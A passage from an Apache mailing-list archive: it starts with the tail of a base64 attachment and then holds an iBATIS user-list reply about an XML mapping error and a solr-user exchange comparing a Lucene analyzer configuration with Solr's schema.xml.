mY+yLvY+XiNoh35+RmHOeuevNVx4a0gLEBaY8vZyJHy5SUTKznOXYSAtubJy z8/O2TQDm7/xXd3UNtbtbfY5Jb+FY5ILkvu8m/gguFb5VwpZ8L13qSWCfdrp PD+k3ej2TQXmqTajIfKxLNnI2wxxnqx+8yM593PXqR/DWkO8LNaZaGV5oz5j 8O86XDHr3ljRvwx0JFW9UtJb/SL2zt7p7Sa4geKO4jzuhZlIDjBByCc9R060 Ac/pep6lF4QsdcBhuYJ4pNQuY7mfy3iilJmCpI3yny1YoA21TgHdGBg9Bpmo RarptvfQK6xTLuUOBn8wSCPRlJVhgqSCCWSaLpsv2ISWULR2OPssRX93CRja yp90Mu0BWxlRkAjJzO9nbvfw3zR5uYYnhjfJ4RyhYY6cmNPy9zQBPRRRSGFF FFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAB5XnKU3sme64P6EEH8RSLpIYc 3Un/AH5h/wDjdSRsqK7t0AHf3Apjap5X/LEH/tp/9auqiqjj7plPlvqPe0W1 RAHaQ84LBRgewUAfpXyd43/5HjW/+v6b/wBDNfV/20XcaHZsbLDGc9Mf4ivl Dxv/AMjxrf8A1/Tf+hmvYydNVanNvZGFe1o2PdPhP/yKc3/X1/7Sjruq4X4T /wDIpzf9fX/tKOu6rzM0/wB8qepphP4MQooorgOgKKKKAKkceoDUpZJLq1aw K4jgW2YSq3HJk3kEfe42DqOeOcbSroaNc3Gn39veteXV/NMLiKzlmjlSSQ+W WlVSF2psjO8jaI/7gUnpKKAPL7fTNc0nwpottpZ1OBp9Hja/ErTzeSyvahgq Ft0bCN7jCRFGOML8yri3aR30dvarqt1rtxou6cq9tbXkMwfEPlgqrvclP+Pn mQ4z2x5efRaKdxHIeF4NQsb+f7dFdfZ57y+FoEVlSLN1K58xfVxhlkPy4+Ub Ccy5MWg+bfWtnNDq6S/2/dXN0yTXMcaROt40TRupCqCHTd5ZHLAPycV6LRRc Dy+8i8TyTrGb3U7aOHzotPKWlxO7utzOqlikiL/q1t8Nc7kbOc/6wnqPFltq GpX2k6fa6Xa31pulubuO9lZLeRUXYsT4jcElpRIAR1hz1GR1FFFwPOrA6753 h+HUE1C4urdUtZrZXuok3RzMj3ZuFASUMqB/KlHIxg5bDs0Eazo2k+Gf7Qh1 PbBFA84t4pWRbdbV4xEYVBYOssibgQS3Dg7UKxekUUXA8ztodav57q8c66qN PCkCs9xD+5l1K4WX5MjBFuU5I3Iu0jbgEa18+oS+AtZ0mWz1Ce6ks9UjgZom clI5HjhQsfmZ2RkKk5LhSck8ntqKLgcLNb6lYDS449MmvtVs7+S5nmHypfOb O4VZDIRhNzBU2n/V/Ko+TYW5u4bxMlpf2+nXOtXECxM8Ui2d7A3mG0vQQPPd 5G+dbfGG2himAGOT69RRcDzPxHpurxadrdtZJq9xEzXNjFG8s04e2bTmkHDF txNwcB+WzhAcfLWlqdp4ggXWJHl3alcxWscd3Y2sgiNpHLmX5A5cSgTTcK4Z l2eWdwbb3VFFwPM5I9Yj0i2UXWr6gnnym3shbXtm1xlYwoM4d5YQrGTBnO1t x4CqjqeJpdXn8P3WirBq816Z9UaUJbTPG8Dw3ZhXzANjD54AEDEg7RgFcD0y ii4HKeHkGix6oJLTU3u5NTkMkYErx7JrpzG8e4+XtCSBn8voAd3IxXV0UUhh RRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFF FFABRRRQAydttnMf93/0IVwl1D4jWeTTIrnzbedzIuoN9+FCfmUgY+bkYx+G P4e8kUvEyDb8wwQwyD+RB/UVTNlKe9p/36k/+OV3YetCELSMKkJSegzTwQkC l2cgSAs2Mt/q+TjivmLxv/yPGt/9f03/AKGa+qIIPKUbvL3LnHlqVAzjPUk5 4HfsK+V/G/8AyPGt/wDX7N/6Ga9bKZqdao12RhWTSime6fCf/kU5v+vr/wBp R13VcL8J/wDkU5v+vr/2lHXdV5Waf75U9TbCfwYhRRRXAdAVnajrdlpdxBb3 Au3nnR3jjtbOa4YqhUMSI1YgAuoyfUVo1jTf8j3pn/YJvv8A0daU0IT/AISi x/58tc/8Ed7/APGqP+Eosf8Any1z/wAEd7/8arbyfU0ZPqaNAMT/AISix/58 tc/8Ed7/APGqP+Eosf8Any1z/wAEd7/8arbyfU1z2keMLTVEtHmtbrTkvYFu LRr1ogJ0YooK7HbBzLEMNgkuAAecGgE3/CUWP/Plrn/gjvf/AI1R/wAJRY/8 +Wuf+CO9/wDjVXE1zSpLu2tE1Wza5uohNbwrcKXmjIJDoucsuATkccGql54n sIYpTZ3VtezQXlvaXEMNwpaFpZli+cDJUgsTg4ztI4o0AT/hKLH/AJ8tc/8A BHe//GqP+Eosf+fLXP8AwR3v/wAarXhuI7hC8MySIGZCyMCAykqw47gggjsQ RUmT6mjQDE/4Six/58tc/wDBHe//ABqmP4v0qKW3jnTU7Y3EyW8TXOk3UKNI 5wq7njABJ9TW9k+priviCSZfDeT/AMxi0/8AR8dGgHagFmAHU8Cn+S/+z/30 KSL/AFyf7wpp+8frQA/yX/2f++hR5L/7P/fQqOs3UNYFncLa29jdahdlfMa3 tTGGjQkgOxkZVAJBABOThsAhWINANbyX/wBn/voUeS/+z/30KzU1ix+121jP cw22pXEQlSwmmTz8YJPyhjnGGyVyPlPPFUJvGXh+PTpr+HVrK6toJYY53trm NxD5sgjVnIbCrk5JPYHrigDofJf/AGf++hR5L/7P/fQrCfxZoMAL3Wr6fbRF gsUk15EFmBjR9yfN0xIvXB5BxgqTpNe2ieZuuoR5cqwyZkHySNt2ofRjvTA6 ncPUUAW/Jf8A2f8AvoUeS/8As/8AfQqhaapp9/cXNvZ39rcTWrbLiOGZXaFs kYcA5U5B4Poat0aASeS/+z/30KrwXEVzF5sDh03Mu4dCVJU/qDUlZHhj/kAx f9dZv/Rr0gNpY2ZcjGOnJApfJf8A2f8AvoUH/j3X/eP8hUdPQCTyX/2f++hR 5L/7P/fQqOo3lKSwxiNmMrFQQRgcZ5yR2B/KjQCx5L/7P/fQo8l/9n/voVVN 3bAuDcRAp94bx8vOOfTmlNzbiISmeIRscBy4wT9aNALPkv8A7P8A30KPJf8A 2f8AvoVAZolLAyICoJbLDgDGc/mPzpUkSVA8bq6noynINGgE3kv/ALP/AH0K PJf/AGf++hUdFGgDJpY7eWGKV1V52KxrnJYgFj09gakVSzYHWsfU/wDkPaH/ ANdZv/RTVtw/6z8D/I0AHkv/ALP/AH0KPJf/AGf++hUdFGgEnkv/ALP/AH0K PJf/AGf++hUdVLvUIrK5sLeRXL3s5gjKgYDCN5MnnpiNvXkijQC/5L/7P/fQ o8l/9n/voViy+JNJtWvft17DYx2d0to8t3KkSNIYklAUk8/K49+D6ZqBvFmk 2l7qFvql9Zad9muvs8bXV0kfnfuYpSRux080DHPQHvigDofJf/Z/76FHkv8A 7P8A30Kjoo0Ak8l/9n/voUjRlFLMUVQMklwAB+dMqvf/APIOuv8Ark/8jRoB JBPHc28c8LbopUDo2MZBGQeakqhof/Iv6b/16xf+gCr9IYUUUUAFfKPjf/ke Nc/6/Zv/AEM19XV8o+N/+R41v/r+m/8AQzXvZF8U/RHJieh7p8J/+RTm/wCv r/2lHXdVwvwn/wCRTm/6+v8A2lHXdVwZp/vlT1Lwn8GIUUUVwHQFY0//ACPe mf8AYJvv/R1pWzXOeIbDxA+r2Oo6AdP8yK2uLaUXsjpxI8LArtRuf3WOfWmh HR0Vxez4j+vh/wD8CZP/AIzRs+I/r4f/APAmT/4zRYDtK830/wCHt2mkWVhP YaLaRwRWsN2lsxdNR8ueCRpJgYl+YLFIADuz5zcjnOps+I/r4f8A/AmT/wCM 0bPiP6+H/wDwJk/+M0LQCW58JzzeKJ77aktrc3kF4zPf3CCJoljAX7OhEchz CCHZhgsMqwQBsmfwPrV/fwve3COI1RJrn+1LhnuCLq2lZ1j2hbclYHIWNsAs oBwoI0dnxH9fD/8A4Eyf/GaNnxH9fD//AIEyf/GaeoHTaRaXFhYJZTGFo7fE UDxIE3RADbuQAKrDoQvynGQFztW9XF7PiP6+H/8AwJk/+M0bPiP6+H//AAJk /wDjNKwHaVxfxA/1vhv/ALDFp/6Pjo2fEf18P/8AgTJ/8ZqneaD411m80w6o dEFvaX0FyzQ3MhbCSK5AHlAEkL3IoQHocX+uT/eFNP3j9aQs6AvGqs68qrNt BPYE4OPyNZBfxGT/AKnSv+/0n/xNAGvWNfWOoW2ryarpUVrcTTwR208F1M0K 7Y2dkZXVHIOZHBBU5ypBXaQzt/iP/njpX/f6T/4mjf4j/wCeOlf9/pP/AImk My5dB1a4u51dbJLa+v7XUbiRZ3Z4JIRDmJF2ASKTbj5yyH5z8vy4ao/g7UDp fhyBZrXztI06OFgWbbJNHLayqAduQhNsylsZG4Haelb+/wAR/wDPHSv+/wBJ /wDE0b/Ef/PHSv8Av9J/8TTuIztM0DUIfF0+t3RtUSdZS0UUjOVZ4rNcAlRk A20nPHBXjkgZOneEdb03SLTSk/s+aFp9Oubmdrh1aNrdbdWVE8shwRb5BLL9 /GBjJ6ff4j/546V/3+k/+Jo3+I/+eOlf9/pP/iaLgY/hPwnPoNxbm4VGFnZ/ Y4Zzf3Fw0q5TLCNyEgB8tSUXd1ADAL83X1kb/Ef/ADx0r/v9J/8AE0b/ABH/ AM8dK/7/AEn/AMTQBr1keGP+QDF/11m/9GvRv8R/88dK/wC/0n/xNWNFsptP 0qO2nKGVWdj5ZJHzOzdSB6+lIZpn/j3X/eP8hUdU76TVBsSwis2QZLNPIwOf QAKfT17/AJ1N/iP/AJ46V/3+k/8AiaYjXqJ0ka4t2Ty9qMSxdiOqleMA/wB7 P4Vm7/Ef/PHSv+/0n/xNG/xH/wA8dK/7/Sf/ABNIZagind4EKhYbZFQOQwB2 yRnuoHIQngn61MIpkuXuEMbSMzAb2K4BWMZyAf7hGPes/f4j/wCeOlf9/pP/ AImjf4j/AOeOlf8Af6T/AOJp3EXBYLHaPCpViWjJYZUuEVAASORkq30zmrEU flo24JvdtzbXd+wHLNyentWXv8R/88dK/wC/0n/xNG/xH/zx0r/v9J/8TRcD XorI3+I/+eOlf9/pP/iaN/iP/njpX/f6T/4mkMNT/wCQ9of/AF1m/wDRTVtw /wCs/A/yNYC2mr3Oq2NzerYpFbM7fuZHJO5CvQqPUd62JnnjhdrVI3nwQglY quTxyQCf0poQ+isjf4j/AOeOlf8Af6T/AOJo3+I/+eOlf9/pP/iaQzXrG1/Q Ytel0lLq3tbi0tbwzzw3KB1dfJlQAKQQSGdTz6Z64p2/xH/zx0r/AL/Sf/E0 b/Ef/PHSv+/0n/xNAHMTeA5LTVJ7zS7a1jt/PlMNlbX02nqqSRWykl4VyCHt 2+TBB35JBGKZY+HtZ8O+JrY6bZWV1EbWZF3TSwRRoIrCIAtskIYmBiFJOVGd xINdVv8AEf8Azx0r/v8ASf8AxNG/xH/zx0r/AL/Sf/E07iLOiab/AGPoOnaX 5vnfY7WK38zbt37FC5xk4zjOMmr1ZG/xH/zx0r/v9J/8TRv8R/8APHSv+/0n /wATSGa9V7//AJB11/1yf+Rqhv8AEf8Azx0r/v8ASf8AxNMmXxDNDJE0OlhX UqcTSZwR/u0AW9D/AORf03/r1i/9AFX6q6bbPZ6XaWshUvDCkbFehIUA4/Kr VABRRRQAV8o+N/8AkeNc/wCv6b/0M19XV8o+N/8AkeNb/wCv6b/0M172RfFP 0RyYnoQ2fizXtOt/s9lqt1bxZzsilKgnAGTj2A/KrH/CdeKf+g/qH/gQ3+NF FfSShFu7Rx2sJ/wnPin/AKD+o/8AgS/+NH/Cc+Kf+g/qP/gS/wDjRRS9nDsA f8Jz4p/6D+o/+BL/AONH/Cc+Kf8AoP6j/wCBL/40UUezh2AP+E58U/8AQf1H /wACX/xo/wCE58U/9B/Uf/Al/wDGiij2cOwB/wAJz4p/6D+o/wDgS/8AjR/w nPin/oP6j/4Ev/jRRR7OHYA/4TnxT/0H9R/8CX/xo/4TnxT/ANB/Uf8AwJf/ ABooo9nDsAf8Jz4p/wCg/qP/AIEv/jR/wnPin/oP6j/4Ev8A40UUezh2AP8A hOfFP/Qf1H/wJf8Axo/4TnxT/wBB/Uf/AAJf/Giij2cOwB/wnPin/oP6j/4E v/jR/wAJz4p/6D+o/wDgS/8AjRRR7OHYA/4TnxT/ANB/Uf8AwJf/ABo/4Tnx T/0H9R/8CX/xooo9nDsAf8Jz4p/6D+o/+BL/AONH/Cc+Kf8AoP6j/wCBL/40 UUezh2AP+E58U/8AQf1H/wACX/xo/wCE58U/9B/Uf/Al/wDGiij2cOwB/wAJ z4p/6D+o/wDgS/8AjR/wnPin/oP6j/4Ev/jRRR7OHYA/4TnxT/0H9R/8CX/x o/4TnxT/ANB/Uf8AwJf/ABooo9nDsAf8Jz4p/wCg/qP/AIEv/jR/wnPin/oP 6j/4Ev8A40UUezh2AP8AhOfFP/Qf1H/wJf8Axo/4TnxT/wBB/Uf/AAJf/Gii j2cOwB/wnPin/oP6j/4Ev/jR/wAJz4p/6D+o/wDgS/8AjRRR7OHYA/4TnxT/ ANB/Uf8AwJf/ABo/4TnxT/0H9R/8CX/xooo9nDsAf8Jz4p/6D+o/+BL/AONH /Cc+Kf8AoP6j/wCBL/40UUezh2AP+E58U/8AQf1H/wACX/xo/wCE58U/9B/U f/Al/wDGiij2cOwB/wAJz4p/6D+o/wDgS/8AjR/wnPin/oP6j/4Ev/jRRR7O HYA/4TnxT/0H9R/8CX/xo/4TnxT/ANB/Uf8AwJf/ABooo9nDsAf8Jz4p/wCg /qP/AIEv/jR/wnPin/oP6j/4Ev8A40UUezh2AP8AhOfFP/Qf1H/wJf8Axo/4 TnxT/wBB/Uf/AAJf/Giij2cOwB/wnPin/oP6j/4Ev/jR/wAJz4p/6D+o/wDg S/8AjRRR7OHYA/4TnxT/ANB/Uf8AwJf/ABo/4TnxT/0H9R/8CX/xooo9nDsA f8Jz4p/6D+o/+BL/AONH/Cc+Kf8AoP6j/wCBL/40UUezh2AP+E58U/8AQf1H /wACX/xrEubma8uZLi4kaWaRizu5yWJ6knuaKKfKlshrc//Z --0-386431060-1135747423=:56658-- From [email protected] Wed Dec 28 08:37:47 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38556 invoked from network); 28 Dec 2005 08:37:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Dec 2005 08:37:47 -0000 Received: (qmail 67694 invoked by uid 500); 28 Dec 2005 08:37:46 -0000 Delivered-To: [email protected] Received: (qmail 67673 invoked by uid 500); 28 Dec 2005 08:37:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67662 invoked by uid 99); 28 Dec 2005 08:37:46 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Dec 2005 00:37:46 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=HTML_MESSAGE,MAILTO_TO_SPAM_ADDR,SPF_HELO_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rly05c.srv.mailcontrol.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Dec 2005 00:37:45 -0800 Received: from LYON-EXCHANGE2.sword.fr ([161.129.204.104]) by rly05c.srv.mailcontrol.com (MailControl) with ESMTP id jBS8bM7R015015 for <[email protected]>; Wed, 28 Dec 2005 08:37:23 GMT X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C60B89.CB7E1FF8" Subject: =?iso-8859-1?Q?RE=A0=3A_problem?= Date: Wed, 28 Dec 2005 09:36:27 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: problem thread-index: AcYLbtB35J/cwjQwR2OIjROY5PcVAgAGjlu2 References: <[email protected]> From: "SIX Douglas" <[email protected]> To: <[email protected]> X-Scanned-By: MailControl A-05-40-01 (www.mailcontrol.com) on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C60B89.CB7E1FF8 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, =20 In the text you have about all needed informations to find out what is wron= g. =20 The error occurs in the KlaimHelper.xml file. =20 In this file you have declared a namespace called Askum. =20 In this namespace there is a statement called KlaimResult wich has an error. =20 Can you send here the content of the file and I'll try to help you find out= what's wrong with it ? =20 ___________________________=20 Douglas SIX SWORD Nord 03 20 65 30 50=20 ________________________________ De: Iwan Santoso [mailto:[email protected]] Date: mer. 28/12/2005 06:23 =C0: [email protected] Objet : problem Hi, I'm a newbie. I have a problem when I try to do inserting. Could anybody he= lp me. Thanks. -iwan- ________________________________ Yahoo! DSL <http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=3D37474/*http:/= /promo.yahoo.com/broadband/> Something to write home about. Just $16.99/mo= . or less Click here <https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D> t= o report this email as spam. ------_=_NextPart_001_01C60B89.CB7E1FF8 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML dir=3Dltr><HEAD><META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/htm= l; charset=3Dunicode"> <META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR></HEAD> <BODY> <DIV id=3DidOWAReplyText31670 dir=3Dltr> <DIV dir=3Dltr><FONT face=3DArial color=3D#000000 size=3D2>Hi,</FONT></DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2>In the text you have about all n= eeded=20 informations to find out what is wrong.</FONT></DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2>The error occurs in the KlaimHel= per.xml=20 file.</FONT></DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2>In this file you have declared a= namespace=20 called Askum.</FONT></DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2>In this namespace there is a sta= tement=20 called KlaimResult wich has an error.</FONT></DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV dir=3Dltr><FONT face=3DArial size=3D2>Can you send here the content of= the file=20 and I'll try to help you find out what's wrong with it ?</FONT></DIV> <DIV dir=3Dltr><FONT face=3DArial color=3D#000000 size=3D2></FONT>&nbsp;</D= IV></DIV> <DIV id=3DidSignature66842 dir=3Dltr> <DIV RE><FONT color=3D#000080><FONT=20 face=3DArial>___________________________</FONT></FONT> <DIV RE><PRE></PRE> <DIV RE><FONT color=3D#000080><FONT face=3DArial size=3D2>Douglas SIX<BR>SW= ORD=20 Nord</FONT><BR><FONT face=3DArial size=3D2>03 20 65 30 50</FONT></FONT> <DIV RE><PRE></PRE></DIV></DIV></DIV></DIV></DIV> <DIV dir=3Dltr><BR> <HR tabIndex=3D-1> <FONT face=3DTahoma size=3D2><B>De:</B> Iwan Santoso=20 [mailto:[email protected]]<BR><B>Date:</B> mer. 28/12/2005 06:23<BR><B>=C0:<= /B>=20 [email protected]<BR><B>Objet :</B> problem<BR></FONT><BR></DIV> <DIV> <DIV id=3DRTEContent>Hi,<BR><BR>I'm a newbie. I have a problem when I try t= o do=20 inserting. Could anybody help me. Thanks.<BR><BR>-iwan-<BR></DIV> <P> <HR SIZE=3D1> <A=20 href=3D"http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=3D37474/*http://pro= mo.yahoo.com/broadband/">Yahoo!=20 DSL</A> Something to write home about. Just $16.99/mo. or less<BR><BR><FONT= =20 style=3D"BACKGROUND-COLOR: #ffffff"> <P align=3Dcenter><FONT style=3D"BACKGROUND-COLOR: #ffffff">Click <A=20 href=3D"https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D">here</= A>=20 to report this email as spam.</FONT></P></FONT></DIV></BODY></HTML> ------_=_NextPart_001_01C60B89.CB7E1FF8--
From [email protected] Fri Mar 03 18:07:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40343 invoked from network); 3 Mar 2006 18:07:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2006 18:07:37 -0000 Received: (qmail 55671 invoked by uid 500); 3 Mar 2006 18:08:23 -0000 Delivered-To: [email protected] Received: (qmail 55641 invoked by uid 500); 3 Mar 2006 18:08:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55632 invoked by uid 99); 3 Mar 2006 18:08:23 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 10:08:23 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 10:08:21 -0800 Received: by nproxy.gmail.com with SMTP id o60so535179nfa for <[email protected]>; Fri, 03 Mar 2006 10:08:00 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ePMkJ9VH27FUMpT56bt1a5Q0ajs68bFARZ9gsVedWk06lTrXRxL9Vg2W3md1LuCwyuJr3aDxpqCg5/fKY0SCjgkuIgX8BCU7MUfkv2E7Hsd2FmOa9y4pu2+fCbeRO7G7a6DpjNh0yQEeRFC0Stkd84kfQp55MTaGsxDkPZ7mBfY= Received: by 161.129.204.104 with SMTP id w1mr1219645nfw; Fri, 03 Mar 2006 10:07:55 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 3 Mar 2006 10:07:55 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 3 Mar 2006 13:07:55 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: XML Schema for schema.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Grant, I just today got a chance to page through your ApacheCon Lucene presentation. I did a double-take when I paged across your "sample configuration" slide. WIld how similar some of it looks to Solr's schema! So since it seems like your stuff has it's own schema too, do you see any features needed for Solr's schema? -Yonik =3D=3D=3D=3D=3D=3D=3DFrom Gran's Presentation=3D=3D=3D=3D=3D=3D=3D=3D Declare a Tokenizer: =09<tokenizer name=3D"standardTokenizer" class=3D"StandardTokenizerWrapper"/> Declare a Token Filter: =09<filter name=3D"stop" class=3D"StopFilterWrapper" =09ignoreCase=3D"true" stopFile=3D"stopwords.dat"/> Declare an Analyzer: =09<analyzer class=3D"ConfigurableAnalyzer"> =09<name>test</name> =09=09=09=09 =09 =20 <tokenizer>standardTokenizer</tokenizer> =09<filter>stop</filter> =09</analyzer> Can also use existing Lucene Analyzers =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D From [email protected] Fri Mar 03 21:24:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46213 invoked from network); 3 Mar 2006 21:24:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2006 21:24:31 -0000 Received: (qmail 49500 invoked by uid 500); 3 Mar 2006 21:25:18 -0000 Delivered-To: [email protected] Received: (qmail 49480 invoked by uid 500); 3 Mar 2006 21:25:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49471 invoked by uid 99); 3 Mar 2006 21:25:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 13:25:18 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50508.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 03 Mar 2006 13:25:16 -0800 Received: (qmail 54077 invoked by uid 60001); 3 Mar 2006 21:24:55 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=sN9Q8Tgob3gIyAjt2rEjdjN5bfAylvXEt1mlAkQvPOurefnQJYKSz3N3DpWP4AtRDpoid66o/c+tVs2YdyV0A1oaIxnU4tZhxtFpPLByfGYUCODUIxGwZHtxnHLwXsARiWtNJzIAmh+Kp9LAsGmild7LOTcA2/Swrp0YSdRiZJI= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web50508.mail.yahoo.com via HTTP; Fri, 03 Mar 2006 13:24:55 PST Date: Fri, 3 Mar 2006 13:24:55 -0800 (PST) From: Grant Ingersoll <[email protected]> Subject: Re: XML Schema for schema.xml To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-218708418-1141421095=:53522" Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-218708418-1141421095=:53522 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Great minds think alike :-) Yeah, it is a bit eerie how similar they are, but I think they both go to solve a similar issue (mine started out with the desire to have only one Analyzer that I could configure with different filters, believe it or not, and grew from there). The biggest difference that I see is that we are search engine agnostic (Lucene is but one implementation you could use), but there is no need for Solr to be that. We use Term Vectors quite a bit, in fact, I was thinking of having a go at a patch (so if you want to point me at where to begin)... Other than that, I haven't delved into as deeply as I would like to at this point yet, but that is coming soon. Yonik Seeley <[email protected]> wrote: Grant, I just today got a chance to page through your ApacheCon Lucene presentation. I did a double-take when I paged across your "sample configuration" slide. WIld how similar some of it looks to Solr's schema! So since it seems like your stuff has it's own schema too, do you see any features needed for Solr's schema? -Yonik =======From Gran's Presentation======== Declare a Tokenizer: class="StandardTokenizerWrapper"/> Declare a Token Filter: stopFile="stopwords.dat"/> Declare an Analyzer: test standardTokenizer stop Can also use existing Lucene Analyzers ================================== ---------------------------------------------- Grant Ingersoll http://www.grantingersoll.com --------------------------------- Yahoo! Mail Bring photos to life! New PhotoMail makes sharing a breeze. --0-218708418-1141421095=:53522-- From [email protected] Sat Mar 04 15:14:59 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11744 invoked from network); 4 Mar 2006 15:14:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Mar 2006 15:14:59 -0000 Received: (qmail 54535 invoked by uid 500); 4 Mar 2006 15:15:45 -0000 Delivered-To: [email protected] Received: (qmail 54497 invoked by uid 500); 4 Mar 2006 15:15:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54483 invoked by uid 99); 4 Mar 2006 15:15:45 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 07:15:45 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 07:15:44 -0800 Received: by nproxy.gmail.com with SMTP id x37so645340nfc for <[email protected]>; Sat, 04 Mar 2006 07:15:22 -0800 (PST) 